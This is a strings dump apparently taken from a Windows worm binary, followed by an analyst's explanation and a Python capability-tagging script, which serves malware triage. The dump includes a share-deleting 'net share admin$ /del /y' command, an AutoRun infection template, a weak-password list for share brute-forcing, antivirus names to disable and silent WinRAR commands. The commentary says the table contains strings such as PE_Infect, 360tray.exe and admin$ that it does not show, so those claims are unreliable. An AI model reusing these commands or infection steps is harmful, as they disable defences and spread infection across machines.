*aj_Rp
ANSI_CHARSET
AnsiString To UnicodeString Error!
Apartment
ARABIC_CHARSET
Array 
aR._t[T-
Assertion failure
[AutoRun]
:\autorun.inf
_"B2S@
+B9gP<Z2
BALTIC_CHARSET
baseball
$$.bat
Boolean
BQ;4lE@
BQcwm~'Z
ByRef 
CaptureNet
ccEvtMgr
ccProxy
C ;C$s
ccSetMgr
ChangeServiceConfig2A
ChangeServiceConfig2W
CharNextA
CharToOemA
CharUpperBuffA
CHINESEBIG5_CHARSET
cl3DDkShadow
cl3DLight
clActiveBorder
clActiveCaption
clAppWorkSpace
clAqua
Classes
^Classes
clBackground
clBlack
clBlue
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clCream
clDefault
clFuchsia
clGradientActiveCaption
clGradientInactiveCaption
clGray
clGrayText
clGreen
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clLime
clMaroon
clMedGray
clMenu
clMenuBar
clMenuHighlight
clMenuText
clMoneyGreen
clNavy
clNone
clOlive
CloseHandle
CloseServiceHandle
closesocket
clPurple
clScrollBar
CLSIDFromProgID
clSilver
clSkyBlue
clTeal
clWhite
clWindow
clWindowFrame
clWindowText
clYellow
cmd.exe /c net share 
cmd.exe /c net share admin$ /del /y
c:\MyRARwork
CoAddRefServerProcess
CoCreateInstance
CoCreateInstanceEx
CoInitialize
CoInitializeEx
Common Files
ComnView
CompareStringA
ComPlus Applications
computer
connect
Consts
ControlService
Cool_GameSetup.exe
CopyFileA
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
CoUninitialize
CPh@yC
C:\Program Files\Delphi7\Source\RTL\sys\SysUtils.pas
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
C:\Program Files\WinRAR\myrar.txt
C:\Program Files\WinRAR\winrar.exe
"C:\Program Files\WinRAR\winrar.exe" u -as -ep1 -inul -ibck "
"C:\Program Files\WinRAR\winrar.exe" x -inul -ibck -p- "
c:\QQ.sys
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDirectoryA
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIcon
CreatePalette
CreatePenIndirect
CreateServiceA
CreateThread
CreateToolhelp32Snapshot
Currency
CVariants
cxzccccccccccccccccccccccccccccccccc
C(_^[Y]
database
DbgPrint
Decimal
Default
DEFAULT_CHARSET
del %0
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
$ /del /y
Desktop_1.ini
DestroyIcon
.)D$H)
Dispatch
DispatchMessageA
Documents and Settings
\Documents and Settings\All Users\
\Documents and Settings\All Users\Start Menu\Programs\Startup\
DosDateTimeToFileTime
Double
DrawIconEx
drivers\
d{,RU}
Dsniff
D$t+D$\
D$t#D$h
dwPointerRva: %.8X = dwKSDT!
EAbstractError
EAccessViolation
EAssertionFailed
EASTEUROPE_CHARSET
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError(MA
EFileStreamError
EFOpenError
EHeapException
EInOutError0
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidGraphic0
EInvalidGraphicOperation
EInvalidOp
EInvalidOperation
EInvalidPointer`
EListError
EMathError
EmLpFv\
enable
EnterCriticalSection
EnumCalendarInfoA
EnumWindows
	EOleError
EOleException
EOleSysError
EOSError
EOutOfMemory
EOutOfResources
	EOverflow
EPrivilege
ERangeError
EReadError
ErrCode
ESafecallException
EStackOverflow
EStreamError
EStringListError
EU3"[r
EUnderflow
e~U#[z=
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedErrorP
EWriteError
ExAllocatePool
ExAllocatePoolWithTag
	Exception 
ExCz7Si
ExFreePool
ExFreePoolWithTag
ExitProcess
Explorer
ExtractIconA
e>YqmkbkruX`~tiiv`t*`~a%
EZeroDivideT
FComObj
File Read Error!
FileTimeToDosDateTime
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
Find Ssdt Base Error!!!
FindWindowA
`'fI]q
FireSvc
fKill360_4
#fl<-.!
F,l|-5
FormatMessageA
;F'P|[
FPUMaskValue
FreeLibrary
FreeResource
f-'rE[uL
F'Rn`g
fuckyou
FunUnit
ganran
GB2312_CHARSET
gdi32.dll
GDI32.DLL
GetACP
GetBitmapBits
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentThreadId
GetDateFormatA
GetDeviceCaps
GetDIBits
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDriveTypeA
GetErrorInfo
GetFileAttributesA
Get File Info Error!.ExitProc!
Get File Memory Error!
GetFileSize
GetFileType
GetFullPathNameA
gethostbyname
gethostname
GetIconInfo
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
Get PE Load Memory Error!!!
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSysColor
GetSystemDirectoryA
GetSystemMetrics
GetSystemPaletteEntries
GetTempPathA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersion
GetVersionExA
g=<g~r
g+lb`6
GLlzELN?
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
godblessyou
 goto try1
 goto try2
Graphics
+Graphics
GREEK_CHARSET
gw=Ug&
HANGEUL_CHARSET
harley
hDdk S
Heap32First
Heap32ListFirst
Heap32ListNext
Heap32Next
HEBREW_CHARSET
height
hIG(+Z
%hmVD9`M
HNavigate
|?h!pd
Ht Ht.
HTTP\shell\open\command
@\:hwTl
$$.Ico
ID"?7a
.idata
$	idH/z#,!
if exist "
ihavenopass
IInterface
ImageBase: 0x%.8X, KeServiceDescriptorTable: 0x%8X, SSDT BaseAddress: 0x%8X, SSDT Count: 0x%X
I)/~`&n
inet_addr
inet_ntoa
INFNAN
InitializeCriticalSection
InstallShield Installation Information
Integer
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
InternetCloseHandle
Internet Explorer
InternetExplorer.Application
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
InternetReadFile
"I}}q~
Is File No MZ Header!!!
Is File No PE Header!!!
IStringsAdapter
JA]>J9
jeUaD6
JfMgQA
jiamijiemi
jianceshaomiao
JOHAB_CHARSET
K30)96@
K3s)HA
kavsvc
K}%Ekhvqqcv
kernel32.dll
KERNEL32.DLL
KeServiceDescriptorTable
kHTROk
KillTimer
??KKwaQ
KPfwSvc
KPh@yC
kP;Yd.k
K`r.LF/
K[#V2$}
KWindows
Kw?k@w
~KxI[)
LeaveCriticalSection
letmein
L\Jkbn
LoadIconA
LoadLibraryA
LoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegCloseKeySetROP2WNetAddConnection2ANetRemoteTODZwDuplicateObjectCoInitializeVariantCopyExtractIconAURLDownloadToFileAGetDCInternetOpenAhtons
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFileTimeToFileTime
LocalFree
LockResource
LongWord
LOoU(K
lordsys
lstrcpynA
lstrlenA
lsuv>(.akhfjatxh`nbgpnnh*cnephsiqs/ekj.rmho)pnnh*syr
lsuv>(.qsp/36DQU*DNK+`nrk(eisi/r|s
lsuv>(.qsp/36DQU*DNK+SK(Lsl
MAC_CHARSET
Map %s Demo: %.8X!!!
Map %s Error!!!
McAfeeFramework
McShield
McTaskManager
m/d/yy
memcpy
MessageBoxA
Messenger
Microsoft Frontpage
MiniReg
MiniSniffer
>'m=K~
mmmm d, yyyy
:mm:ss
Module32First
Module32FirstW
Module32Next
Module32NextW
MoveToEx
Movie Maker
mpr.dll
MPR.DLL
MskService
MSN Gamin Zone
MS Sans Serif
MulDiv
MultiByteToWideChar
mustang
mW1&?5/
mypass
mypass123
mypc123
myUPdatetxt.txt
-=mz}<pK
navapsvc
netapi32.dll
NETAPI32.DLL
NetApiBufferFree
`NetBios
NetMeeting
NetRemoteTOD
NetScheduleJobAdd
NetShareEnum
Neutral
No.%d: Break...Now Ssdt %.8X
No.%d: Old: %.8X, New: %.8X
NPFMntor
 Ns^di
NTDETECT.COM
NTDLL.DLL
ntkrnlpa.exe
ntoskrnl.exe
OEM_CHARSET
;!o(HS),
ole32.dll
OLE32.DLL
oleaut32.dll
OLEAUT32.DLL
OleStr
\oNCam
Open File Info Error!
OpenProcess
OpenSCManagerA
OpenServiceA
Outlook Express
p71\%F5
passwd
password
patrick
PeepNet
pii\hu
*/`p{l
PostMessageA
@p:pp@ly
P.reloc
Process32First
Process32FirstW
Process32Next
Process32NextW
P.rsrc
qComConst
qcWpS	
q&e$#(
?QGmI	b
qnz&&X
QO6kRy
QQQQQQQQSV
QQQQQQQQSV3
QQQQQQQQSVW3
QQQQQQSVW3
QQQQQSVW
QQQQSV
qQSuj2Y\
QTypInfo
QUE>%"
QueryPerformanceCounter
QueryServiceConfig2A
QueryServiceConfig2W
qwerty
Q}\YYg:
R8Lb;{
RaiseException
[Rb!{7f
.rdata
ReadFile
Read File Info Error!
RealizePalette
Real Ssdt %.8X
Recycled
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
.reloc
ResetEvent
resizable
RESSDT
\\\\.\\RESSDTDOS
rmdir /s /q 
RsCCenter
RsRavMon
RtlAnsiStringToUnicodeString
"RTLConsts
RtlFreeUnicodeString
RtlInitAnsiString
RtlUnwind
Runtime error     at 00000000
RUSSIAN_CHARSET
S8%OkN
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
safeboxTray.exe
Schedule
SdZ]_^[
SelectObject
SelectPalette
SendMessageA
server
SetBkColor
SetBkMode
SetEndOfFile
SetEvent
SetFileAttributesA
SetFilePointer
SetFileTime
SetROP2
SetTextColor
SetTimer
shadow
sharedaccess
shell32.dll
SHELL32.DLL
*ShellAPI
shell\explore=
shell\explore\Command=
shell\open=
shell\open\Command=
shell\open\Default=1
SHFileOperationA
SHIFTJIS_CHARSET
ShortInt
Single
SizeofResource
s`)L$4
Smallint
SmartSniff
sNbUdD
SNDSrvc
Sniffer
?&SNN~
socket
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SPBBCSvc
spynet
StartServiceA
StatusBar
strcat
strcpy
StretchBlt
_stricmp
String
Strings
svchosL.exe
:	SWem
S$_^[Y]
sybase
Symantec Core LC
SYMBOL_CHARSET
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
system32
\SystemRoot\System32\
System Volume Information
SysUtils
<*t"<0r=<9w9i
t9PVWh
tagEXCEPINFO 
tC*B7qe
TColor
TCustomMemoryStream
TCustomVariantType
TCustomVariantType,
-tcW2M
temp123
TerminateProcess
	TErrorRec
test123
TExceptRec
	TFileName
TFileStream
TFontCharset
TGraphic
TGraphic(
THAI_CHARSET
THandleStream
!This program cannot be run in DOS mode.
This program must be run under Win32
Thread32First
Thread32Next
t%HtIHtm
TIconImage
TIdentMapEntry
	TIntConst
TInterfacedObject
TInterfacedPersistent
TInterfacedPersistent4QA
TJZHvn
TlHelp32
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TNetBIOS
TObjecth
TObjectt
toolbar
Toolhelp32ReadProcessMemory
TPatternManagerSV
T%P DA
TPersistent
 Tpt]p
	TRegGroup
TRegGroups
TResourceManager
TSearchRecX
TSharedImage
TStream
TStringItem
TStringList
TStrings
TThreadList
TThreadLocalCounter
t$t#t$l
TURKISH_CHARSET
TXPlatform.exe
t+;YX; 
%.U{*{
U,.-.._
U	0GPhF
Uc4VVB<
u#GFg1
ujj[?h
UnhandledExceptionFilter
Unknown
UnrealizeObject
Update
URLDownloadToFileA
URLMON.DLL
uS6mg*
USB_Infect
user32.dll
USER32.DLL
UTypes
uv'~),
u,)- vC
uvy%><
uY +de
v-]21v
V3[3i3
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
VarUnit
$VarUtils
VarXor
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Visible
VjJaI]Kg
vO1R0fBT
VP%AM1
Vw`N3 
WaitForSingleObject
Wgf68J
WideCharToMultiByte
WideStringh
WINDOWS
Windows Media Player
Windows NT
\WINDOWS\Start Menu\Programs\Startup\
WindowsUpdate
WinExec
?WinInet
wininet.dll
WININET.DLL
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
WinRAR
WinSock
Winsock Expert
WinSvc
WinSvcEx
wkb9:/
WNetAddConnection2A
WNetCancelConnectionA
WriteFile
WSACleanup
WSAStartup
wscsvc
wsock32.dll
WSOCK32.DLL
Wt_Time
>WZ|s<
>x4]qJcoX
)}<Xk:N
x:PCq}n?
XPTPSW
'$XPwW
Xq#iLn
x\vk{$Q.?
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Y4SJ(E
y,~?MtE
_^[YY]
y*yW^F
$YZ_^[
$YZ]_^[
YZ]_^[
$Z]_^[
Z F~WZ
@Z_@H1
ZOnkMeK
ZTUWVSPRTj
ZwClose
ZwCreateFile
ZwDuplicateObject
ZwQueryInformationFile
ZwQuerySystemInformation
ZwQuerySystemInformation failed! ulNeededSize = %ul
ZwReadFile
zxcvxcxzcxzzzzzzzzzzzzzzzzzzzzzzzzzz
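
The string table above is noisy (Delphi RTL class names, colour constants, compressed-section debris) but the worm's capability markers are all in it: a weak-password list next to admin$, administrator and NetShareEnum / WNetAddConnection2A / NetScheduleJobAdd for spreading over shares; the cmd.exe /c net share ... $ /del /y fragments; an [AutoRun] template with shell\open\Command= and shell\explore\Command=, plus :\autorun.inf, Desktop_1.ini and USB_Infect for drive infection; PE_Infect and the "Is File No MZ Header" checks for file infection; KeServiceDescriptorTable, RESSDT, \\.\RESSDTDOS, "Real Ssdt" and ntoskrnl.exe for restoring the SSDT under AV hooks; AV process and service names (360tray.exe, McShield, kavsvc) and Run values (KAVPersonal50, McAfeeUpdaterUI) to kill or remove; and URLDownloadToFileA / InternetOpenUrlA for the down.txt fetch. The tagger below is an added example and is not part of the report: it turns a strings dump into a capability summary that requires more than one corroborating string per capability, so a single generic API name does not trigger a tag. RULES, the thresholds and the capability names are the example's own; SAMPLE_STRINGS is a subset copied from the table, with two Delphi RTL names kept in to show they stay untagged.

```python
"""Capability tagging over a strings dump (added example, not from the report).

RULES, the per-capability minimum-hit thresholds and the capability names are
this example's own; SAMPLE_STRINGS is a subset copied from the table above.
"""
from __future__ import annotations
import re

# capability -> (minimum distinct matching strings, patterns). The threshold
# keeps one generic API name (e.g. InternetReadFile) from tagging a binary.
RULES = {
    "share_bruteforce": (3, [
        r"^admin\$$", r"^administrator$",
        r"^(123456|password|letmein|admin123|qwerty|abc123|mypass|ihavenopass)$",
        r"^NetShareEnum$", r"^WNetAddConnection2A$", r"^NetScheduleJobAdd$",
    ]),
    "share_removal": (1, [r"net share", r"^\$ /del /y$"]),
    "autorun_infection": (2, [
        r"^\[AutoRun\]$", r"^shell\\(open|explore)\\Command=$",
        r":\\autorun\.inf$", r"^Desktop_1\.ini$", r"^USB_Infect$",
    ]),
    "pe_infection": (1, [r"^PE_Infect$", r"Is File No (MZ|PE) Header"]),
    "ssdt_restore": (2, [
        r"^KeServiceDescriptorTable$", r"RESSDT", r"Ssdt",
        r"^nt(oskrnl|krnlpa)\.exe$",
    ]),
    "av_tampering": (2, [
        r"^360(tray|Safe|safebox)\.exe$",
        r"^(McShield|kavsvc|ccEvtMgr|RsRavMon|navapsvc|KPfwSvc)$",
        r"CurrentVersion\\Run\\(AVP|kav|KAVPersonal50|McAfeeUpdaterUI|ShStatEXE)$",
        r"^fKill360",
    ]),
    "downloader": (2, [r"^URLDownloadToFileA$", r"^InternetOpenUrlA$",
                       r"^InternetReadFile$"]),
    "archive_infection": (1, [r'winrar\.exe" u -as']),
}

SAMPLE_STRINGS = [
    "123456", "admin123", "letmein", "password", "admin$", "administrator",
    "NetShareEnum", "WNetAddConnection2A", "NetScheduleJobAdd",
    "cmd.exe /c net share admin$ /del /y", "$ /del /y",
    "[AutoRun]", r"shell\open\Command=", r":\autorun.inf", "Desktop_1.ini",
    "USB_Infect", "PE_Infect",
    "KeServiceDescriptorTable", "RESSDT", "Real Ssdt %.8X", "ntoskrnl.exe",
    "360tray.exe", "McShield",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50", "fKill360_4",
    "URLDownloadToFileA", "InternetOpenUrlA",
    r'"C:\Program Files\WinRAR\winrar.exe" u -as -ep1 -inul -ibck "',
    "clBlue", "TStringList",   # Delphi RTL names: benign, must stay untagged
]


def tag_capabilities(strings) -> dict:
    """Return {capability: [evidence strings]} for capabilities over threshold."""
    compiled = {cap: (min_hits, [re.compile(p, re.IGNORECASE) for p in pats])
                for cap, (min_hits, pats) in RULES.items()}
    evidence = {cap: [] for cap in RULES}
    for s in strings:
        s = s.strip()
        if not s:
            continue
        for cap, (_, pats) in compiled.items():
            if s not in evidence[cap] and any(p.search(s) for p in pats):
                evidence[cap].append(s)
    return {cap: hits for cap, hits in evidence.items()
            if len(hits) >= compiled[cap][0]}


if __name__ == "__main__":
    # Real use: tag_capabilities(open("strings.txt", encoding="latin-1"))
    for cap, hits in tag_capabilities(SAMPLE_STRINGS).items():
        print(f"{cap}: {len(hits)} hits, e.g. {hits[0]!r}")
```

The thresholds matter more than the patterns: InternetReadFile on its own is in every Delphi program that touches the network, whereas InternetReadFile next to URLDownloadToFileA and a hard-coded .txt URL is a downloader, and a password list next to admin$ and NetShareEnum is share brute-forcing rather than a login form.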